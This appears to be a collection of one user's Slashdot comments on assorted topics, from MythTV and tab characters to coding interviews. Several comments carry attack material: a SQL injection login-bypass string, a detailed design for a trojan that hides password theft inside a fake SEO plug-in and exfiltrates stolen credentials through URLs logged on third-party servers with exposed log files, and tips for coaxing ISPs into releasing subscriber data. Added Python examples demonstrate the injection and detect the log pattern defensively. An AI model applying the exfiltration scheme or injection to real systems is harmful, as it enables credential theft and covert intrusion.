Wasn't MythTV headed down this path for many years? The "all in one" solution...
Is that project dead now, replaced by all these other alternatives? I've used MythTV successfully for about 4 or 5 years, but I was thinking it's time to reinvest in my setup. Just not sure what's the best solution.
I don't think I'm looking to do anything too unconventional: DVR functionality, Music Jukebox, etc. Ideally it would be HD capable (mine isn't currently HD), and I like the idea of pulling stuff from the internet (besides just schedule information) - why not integrate with torrent downloading for the ultimate music and video library?
My question - do I even screw with MythTV anymore, or move onto something new?
All my money is invested in P = NP!
Too bad. Had you invested in something with the exclamation point moved 4 places to the left, you'd be golden!
I always thought "wince" was the worst product name since "Nova" was being sold to Spanish speaking countries (the car that "will not" go?).
But Windows Mobile Phone 7 (WiMP 7?) can join the pack.
You have that wrong. By definition something is worth what someone else is willing to pay for it.
It's not circular, it's the very definition.
Using your logic, all definitions are circular: A book is a printed work bounded by covers, which is a book, which is a printed work bounded by covers.
What's something worth?
By definition, whatever somebody will pay for it.
The post claiming that HP paid $1 Billion more than it's worth is a paradox. By definition, it can't be correct.
Had they said "HP paid $1 Billion more than anyone else would have", they would have made more sense (but it, too, would have been incorrect).
Define a small coding project, deliverables and all, and bring in each candidate to complete it as a pre-interview. Then call back those that did the best job.
Problem solved?
I've done this, only had them solve the small coding project IN the interview.
Some people freeze under pressure. Some fakers are discovered. And some really good programmers come out of the mix.
Ten years ago, when SQL injections weren't so well known, I would have the candidate write a very small web application. I had a SQL table set up with 10 users, their passwords (in plain text), and one more piece of data. The goal of the app was for a user to be able to sign in, display their data, or update their data. And Admin could sign in and see everyone's data.
It's about a 30 minute challenge, given all the pieces that I pre-wrote for them. And then after the candidate inevitably wrote code with unsanitized data, I would sign into their application with a password of "' or '1'='1" to show them the flaw in their logic. If I had an engaging discussion with the candidate, and we both learned something, I knew they were a keeper.
It'd be interesting to have the candidate bring their own test. "Bring in a brief problem, and code the solution in front of me". ... and provide the example above as a sample.
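The sign-in flaw described in the comment above, as an added example that is not part of the original comment: a string-built query next to a parameterized one, run against a constructed in-memory table. The table layout, the sample users and all function names are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the interviewer's table:
# user name, plain-text password (as in the comment), one piece of data.
SAMPLE_USERS = [
    ("alice", "correct horse", "alice's data"),
    ("bob", "hunter2", "bob's data"),
    ("carol", "o'neil-pw", "carol's data"),   # legitimate password with a quote
    ("admin", "s3cret-admin", "admin's data"),
]


def make_db():
    """Build the in-memory users table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT, data TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return db


def login_concatenated(db, name, password):
    """The version candidates tend to write: input pasted into the SQL text."""
    sql = ("SELECT name, data FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchall()


def login_parameterized(db, name, password):
    """Same query with bound parameters: input is only ever treated as data."""
    sql = "SELECT name, data FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchall()


def compare(db, name, password):
    """Return (result of the concatenated query or its error, result of the bound query)."""
    try:
        weak = login_concatenated(db, name, password)
    except sqlite3.OperationalError as exc:
        weak = "error: %s" % exc
    return weak, login_parameterized(db, name, password)


if __name__ == "__main__":
    db = make_db()
    cases = [
        ("bob", "hunter2"),         # normal sign-in: both versions agree
        ("alice", "' or '1'='1"),   # the password from the comment
        ("carol", "o'neil-pw"),     # honest input that breaks the string-built SQL
    ]
    for name, password in cases:
        weak, strong = compare(db, name, password)
        print("%-6s %-14r concatenated=%r" % (name, password, weak))
        print("%-6s %-14r parameterized=%r" % (name, password, strong))
```

With the comment's password the WHERE clause becomes `name = 'alice' AND password = '' or '1'='1'`, which is true for every row, so the string-built query returns the whole table while the bound query returns nothing.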
4 Insightful?
Did you mods even read this? Completely compromises the system from a remote location without internet connection?
C'mon!
HP paid $1.2 Billion. That's about $1 Billion more than it was really worth.
Something is worth what someone will pay for it. Therefore, HP paid what it's worth.
I have no doubt that there will be a positive ROI on the purchase.
How about:
Require the user to do something more drastic for more dangerous approvals (as determined by a) the level of security being requested, b) whether it's a permanent or one-time request, c) whether it's signed).
Pressing OK in all cases doesn't seem to be the answer.
Providing root password (as Linux does) isn't bad for more risky requests.
I have required users to key in the word "irreversible" in the past, as a drastic step to make sure they understood that the action they were about to take was permanent. That works better than just popping up the standard "OK" button.
no, I actually apply my program to my wife's cheeks. It's rouge. :)
Thanks for the polite correction. I appreciate learning my frequent mistakes in a non-business setting, especially those that are not caught by spell-checker.
Sure, it's better not to use your own PC, but it's still possible to do so.
I run the same "infection" on my PC as what's on all the other PCs. The only difference is that I don't "discard" the log file, I look at it. So my activities will look exactly like the infected PC, because I run the password retrieval program through the same infection. (... not that I have written this virus, mind you.)
Sounds like we're on the same page though. Always better to use proxies, internet cafes, and remote controlled PCs to retrieve the booty, if possible. The more intermediaries the better.
I think you missed the point that at headquarters you are doing the same actions that a compromised PC would be doing.
That's the cover. Sure, your actions would be logged, but so would the hundreds of thousands of compromised PCs. Your activity would be obscured through sheer quantity of people doing the same actions.
When writing Trojans like this, there are several considerations that this author failed on.
1) Obscuring the code, so that it lasts longer, even upon scrutiny of the source.
2) Obscuring the password delivery mechanism to reduce the likelihood of detection of the code execution.
3) Obscure the password retrieval, to reduce the likelihood that the perpetrator would be caught, even if the authorities discover the code.
Much has been written about item 1, obscuring code. But I haven't seen much research describing items 2 or 3.
If I were writing the code, I would integrate the password theft and remote delivery into the main purpose of the code. For instance, say you wrote a plug-in whose function was to report to the user some information retrieved from Google and other sites. e.g. "This plug-in helps with Search Engine Optimization, by reporting potential keywords that can be added to the web page to increase results". With that sort of purpose, hits to Google and other sites wouldn't be suspected.
Some of my hits to Google would be to locate an open log file, with a Google Query like this query: "get / http/1.1" 200 mozilla filetype:log
Once I found a web server with a log file that was openly being displayed on the web, I'd pass the stolen information (stolen user name, stolen password, and site that this information can be used on) in the form of a URL, possibly encoding the payload information (I don't encode it below, for clarity).
Then my rouge program would request a few more pages from other sites that have open log files, just to obscure my activities, specifically requesting the log file page itself (and disposing of the results). I'll explain why this step is important later...
Example: Using my Google query above, I can see that bullyentertainment.com has its logfile exposed (sorry, bullyentertainment, you're just the first one on my list of hundreds of thousands of open logfiles). That means that my trojan horse can request a page on bullyentertainment.com (like www.bullyentertainment.com/stolen_info?user=myuser&pwd=hunter2&site=gmail.com), and it will log my hit into that file - logging the stolen user name, password, and site information into a remote innocent bystander server. If my rouge program requests a page on bullyentertainment.com with some information encoded in the URL, I can effectively transfer the secret stolen information from the infected PC to an innocent bystander (bullyentertainment.com).
Then later, back at secret spy headquarters, I can use the same Google Query to locate log files that have my secret information in them, like www.bullyentertainment.com/logs/access.log which was a log file shown by my Google Query. I can follow the same pattern as the infected PC - first hit a page passing some URL containing secret information, and then retrieve the log file - so my activities ALSO look like an infected PC. But by retrieving the log file, I have retrieved all of the stolen passwords.
This technique is a way to pass stolen information back to the hacker without detection, by going through an intermediary. Because spy headquarters uses the same procedure as a hacked PC, it cannot easily be detected as the destination of the information. Use of proxies can further hinder attempts to catch the hacker. In a real hack, I'd encode the secret information, so that only I was able to easily decode it. But you get the idea.
PS If you test the above links, no harm, but your IP address will be logged (just as it is with any click), but it will be visible to other users on an exposed log file. No big deal, but I thought I'd mention it.
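A defender's view of the pattern described in the comment above, as an added example that is not part of the original comment: scan a web server's access log for requests carrying credential-looking query parameters and for clients being served the log file itself. The log lines are constructed (documentation-range IPs), and the parameter-name list, log-path rule and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common/combined log format prefix: ip, ident, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed list of query parameter names that suggest credentials in a URL.
SUSPECT_PARAMS = {"user", "username", "login", "pwd", "pass", "passwd", "password"}

# Constructed sample log; the second line reuses the URL shape quoted in the comment.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2010:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2010:13:56:01 +0000] "GET /stolen_info?user=myuser&pwd=hunter2&site=gmail.com HTTP/1.1" 404 310
203.0.113.9 - - [10/Oct/2010:13:56:03 +0000] "GET /logs/access.log HTTP/1.1" 200 88211
198.51.100.22 - - [10/Oct/2010:14:02:11 +0000] "GET /search?q=tab+stops HTTP/1.1" 200 2048
192.0.2.44 - - [10/Oct/2010:14:05:40 +0000] "GET /logs/access.log HTTP/1.1" 200 88500
this line is not in log format
"""


def is_log_path(path):
    """Assumed rule for 'this URL is one of our own log files'."""
    lowered = path.lower()
    return lowered.endswith(".log") or "/logs/" in lowered


def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match:
            yield match.groupdict()


def analyze(log_text):
    """Return findings for credential-like URLs, served log files, and clients doing both."""
    cred_in_url, log_served = [], []
    cred_ips, log_ips = set(), set()
    for rec in parse(log_text):
        url = urlsplit(rec["target"])
        names = {k.lower() for k, _ in parse_qsl(url.query, keep_blank_values=True)}
        hits = sorted(names & SUSPECT_PARAMS)
        if hits:
            # Record parameter names only, so the report never repeats the secret values.
            cred_in_url.append((rec["ip"], url.path, rec["status"], hits))
            cred_ips.add(rec["ip"])
        if rec["status"] == "200" and is_log_path(url.path):
            # A 200 here means the log is readable from the web at all.
            log_served.append((rec["ip"], url.path))
            log_ips.add(rec["ip"])
    return {
        "cred_in_url": cred_in_url,
        "log_served": log_served,
        "both": sorted(cred_ips & log_ips),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for key in ("cred_in_url", "log_served", "both"):
        print(key, report[key])
```

Any entry under `log_served` is the underlying problem: once the log is moved out of the web root or access to it is denied, the server can no longer act as the intermediary the comment describes.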
I don't see statute of limitations as an issue whatsoever.
You sign a contract, exchange some money, and gain ownership to something. You have absolutely no obligation to prove your ownership within five years.
I'm sure he contacted an attorney years ago, and has been waiting to play this card. Why not let Zuckerberg and all the FB employees work really hard to build something for you, and then come and take it if it's yours?
I was kidding. But one can only hope something shuts down that huge pile of crap.
A proposed settlement.
I have talked to ISPs before about legal issues (specifically, a hacking incident). I said "hey, there's a hacking incident coming from one of your IP addresses, and I need all the information that you have on the person."
Their questions: "Are the police involved?" and "Are you a network administrator?"
Since I answered the questions right ("No" and "Yes"), they gave me all the information. Had the police been involved, their instructions were to only provide information with a warrant.
The moral of the story is to ask for the information first, prior to getting the police involved. Mod me up, so the guy sees this critical piece of information!
A real tab character is not n spaces, where n=enough spaces to get to the next tabstop. If people are implementing a "soft tab" as the equivalent of a keyboard macro that spaces n spaces, regardless of distance, they don't know what they're doing. It's not a tab.
There are in fact editors that convert tabs immediately to spaces. I can think of two different conventions here, and I've seen them both. One editor converts tabs to n spaces immediately moving you to the next tab stop. The other converts tab to n spaces where n is a fixed number (configurable, defaulting to 4 or 8, I forget).
The third method, which you allude to as your preferred method, is to insert ASCII 9. That's all fine, but you still have the issue of how to display it. And either one of the two options above could be chosen (personally, I think that jumping to a tab-stop makes the most sense, and when I saw the other behavior - jumping ahead a fixed number of spaces, it seemed very non-intuitive.)
I have also seen the concept where an ASCII 9 is inserted, but then if backspace is entered, it will back you up only one space. So tab-tab-tab-backspace would take you one space to the left of the 3rd tab stop. This is actually the behavior that emulates an old typewriter, and is useful for "decimal tab stops" and "right justification tab stops". So, while it seems like odd behavior when considering how the file is stored, it actually best emulates the original tab intent. (The way this is implemented is that tab-tab-tab-backspace with tab stops every 8 positions would be stored as ASCII 9, ASCII 9, SPACE, SPACE, SPACE, SPACE, SPACE, SPACE, SPACE. The last tab is converted when you press backspace to be the right number of spaces, and then one is removed.)
Life would be simpler if a committee decided on one convention, but that's not how things are. There are many editors out there, and you can't guarantee what editor will be used to open your source code. The safest answer then is to avoid tabs!
This is news? How long has Guerrilla Warfare been around?
Seriously, it didn't work for the Wicked Witch of the West, why would it work for the Wicked Warmongers of the Middle East.
The tool doesn't need to prompt you for "closeness level". It could just track who you post to, and then when you post a message or a photo, give you a list of contacts, and ask which ones you want to send to. It could sort the list based on frequency, and the people you are close to will filter to the top.
Share with (check all that apply):
[ ] Wife, Mary
[ ] Sister, Betty click here to check this one and everyone above
[ ] Dad, Bob click here to check this one and everyone above
[ ] Mom, Irma click here to check this one and everyone above
[ ] Cousin, Fred click here to check this one and everyone above
[ ] Distant Cousin, Joe click here to check this one and everyone above
So use a REAL tab character in your code like $DIETY intended, and set your editor to "show tab character". We have wide screens now - there's NO excuse for using anything except a real tab any more.
Actually, there are several huge reasons for not using real tab.
1) Tab means different things to different people. Even when you spell it out, people interpret it differently. In the original sense (i.e. old Underwood typewriters, and the like), tab meant to release the carriage and let it move thanks to the spring, until it was stopped by a tab stop. This means that if you set your tab stop at position 5, and 60, and you pressed tab when positioned anywhere from position 1 to 4, it skipped to 5. Pressing tab when positioned at 5 through 59 (in this example) skipped you to position 60. So, in its original sense, tab relied on tab stops (literally tiny "tabs" on the top of the typewriter). However, there are few standard document formats (especially for source code) that define the tab stops. You don't see a line in an ASCII or Unicode source code file that says "the tabs for this document are at position 5 and 60". There's no common convention for this.
So people invented arbitrary tab stop conventions. Like "tab stops are every 4 characters" or "tab stops are every 8 characters". But a small difference like this can change the meaning of your document! If you line up code and comments with "real tab characters" every 4 characters, and then someone opens your document with tab stops every eight characters, then the issue is NOT just that things are moved right. The issue is that things do not line up! If I create a nice comment section with a table explaining something, and use tab characters counting on a tab stop every 4 characters, and you open it with tab stops every 8 characters, the MEANING of the comments may change.
Example:
/* Here is a table of all the fields and whether they are changed by this function:
[tab][tab]Passed to function[tab]Returned from function[tab]Changed by function
[tab][tab]------------------[tab]----------------------[tab]-------------------
A[tab][tab][space][space][space]Yes[tab][tab][tab][space][space][space]Yes
longer[tab][tab][space][space][space]Yes
*/
These comments will mean different things depending on the tab stop assumptions!
2) The designers of some editors misunderstood how tab-stops worked, and instead, some made tabs equivalent to a fixed number of spaces. For instance, for some editors a tab is instantly interpreted as 4 spaces. But in the original definition of tabs, it was a "variable" amount of spacing, which took you to a predictable column. These are two vastly different concepts.
3) Those who are smart enough to realize that there is confusion are really annoyed by those who are clueless and inserting real tab characters without knowing that there's an issue.
augmented reality at its best.
Makes me think what other "natural augmented reality senses" are possible, or even already exist in other species.
I'm able to see stupid people at work all the time. Does that count?
Well seeing is believing, calculations can always be wrong ;) Show a real picture of a proton and I am convinced (please no photoshopping on that picture grrr).
Here ya go: [ . ]
Actually, that is not only a "picture" of a proton, that is an actual proton. Simply eliminate everything that is not the proton in question, and you're left with a proton.
See?
There's a saying or something about people not studying history...
I don't know the saying you refer to, but I'm sure it only applies to historians.
He lives in Indiana, that's punishment enough. They just got the internet like 3 years ago. This is coming from a former "hoosier" someone who escaped Kokomo, Indiana several years ago.
Give me a break. The first time I experienced the internet was in 1983, in Indiana. Yeah, not 3 years ago, 27 years ago.
Oh, and get off my lawn. kids. geesh.
I primarily used Latex in college, with an occasional use of Lambskin.
OK, funny funny. But just to be a debugging Nazi, the "min" and "max" functions are used backwards in the code above. You have to "max" with 0 and "min" with 5, otherwise you just force the value to one extreme. It makes sense if you think about it.
Mod Parent up, as evidence of Linus' Law.
Why have a test suite if you can just post your code to Slashdot?